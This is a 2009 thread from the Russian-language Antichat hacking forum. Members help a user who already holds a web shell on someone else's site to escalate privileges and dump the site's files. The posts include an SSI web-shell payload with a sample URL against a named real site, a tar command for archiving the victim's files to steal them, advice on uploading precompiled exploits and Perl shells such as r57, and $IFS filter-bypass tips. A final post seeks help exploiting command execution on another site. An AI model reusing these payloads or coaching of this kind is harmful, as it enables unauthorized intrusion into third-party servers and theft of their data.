ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6811  
Старый 24.04.2009, 02:25
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Byrger
если ты выполняешь
gcc Exploit.c -o Exploit из веб-шелла и у тебя ничего не происходит, то ответ ты написал ниже
Safe-mode: ON
Тебе нужен полноценный шелл, ну или хотя бы веб-шелл с нормальными правами
Пробуй залить перловый шелл, например r57pws.pl
Ищи в гугле
 
Ответить с цитированием

  #6812  
Старый 24.04.2009, 03:13
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

если подключен mod_include, попробуй использовать SSI, создай файл с расширением shtml, например shell.shtml с таким содержанием:
Код:
<!--#exec cmd="$QUERY_STRING_UNESCAPED"-->
, и пользуй его, например
Код:
http://transsib-express.ru/path/shell.shtml?ls -lp
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #6813  
Старый 24.04.2009, 05:36
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Нет это вовершенно 2 разных гелла!
Пытаюсь слить кантент с Safe-mode: ON
И зарутить с Safe-mode: OFF
 
Ответить с цитированием

  #6814  
Старый 24.04.2009, 05:37
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 Byrger
скомпиль на какой-нибудь другой тачке сплоит, да и загрузи его
 
Ответить с цитированием

  #6815  
Старый 24.04.2009, 05:50
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #6816  
Старый 24.04.2009, 11:09
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от Scipio  
2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_
Не получается заархивировать...может потому что файлы которые архивирую с правами на чтение?
Права сменить не могу = ( они стают (1234)
 
Ответить с цитированием

  #6817  
Старый 24.04.2009, 11:18
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.

может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
 
Ответить с цитированием

  #6818  
Старый 24.04.2009, 11:31
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от $n@ke  
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.

может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
Ничего не выдаёт может из-за Safe-mode: ON
Сохраняю в дирку с правами 777
любой фаил пытаюсь c99 архивировать пишет...
Can't call archivator (tar cfzv archive_9f27c.tar.gz -v0x2z.jpg)!

Конешно можно по 1 файлу выкачивать но это не дело...там их более 5к
 
Ответить с цитированием

  #6819  
Старый 24.04.2009, 12:06
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

uname -a выводит? а uname?
если первое нет, то либо пробелы мещают, ищи замену(по принципу $IFS), либо еще чото. если и второе не вывело,то точно сейфмод. тогда с командной строкой тебе не поработать из пхп. Там кто-то писал про перловый скрипт р57 - вот его и юзай.

ps: кинь в личку линку - посмотрю.
 
Ответить с цитированием

  #6820  
Старый 24.04.2009, 17:58
Dr.Gonzo
Познающий
Регистрация: 26.02.2009
Сообщений: 34
Провел на форуме:
276020

Репутация: 18
По умолчанию

Если есть возможность выполнения любых команд на машине, но строка предварительно фильтруется на XSS, что можно сделать через такую дыру? команда cp копирует только локальные файлы почему-то т.е. скопировать что-то указав полный путь к сайту не получается, вот и мучаюсь, пишу названия локальных файлов наугад, потом смотрю в публичной директории их...нарыл пароль от БД, но толку-то от него...
Кто-нибудь помогите пожалуйста!!!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ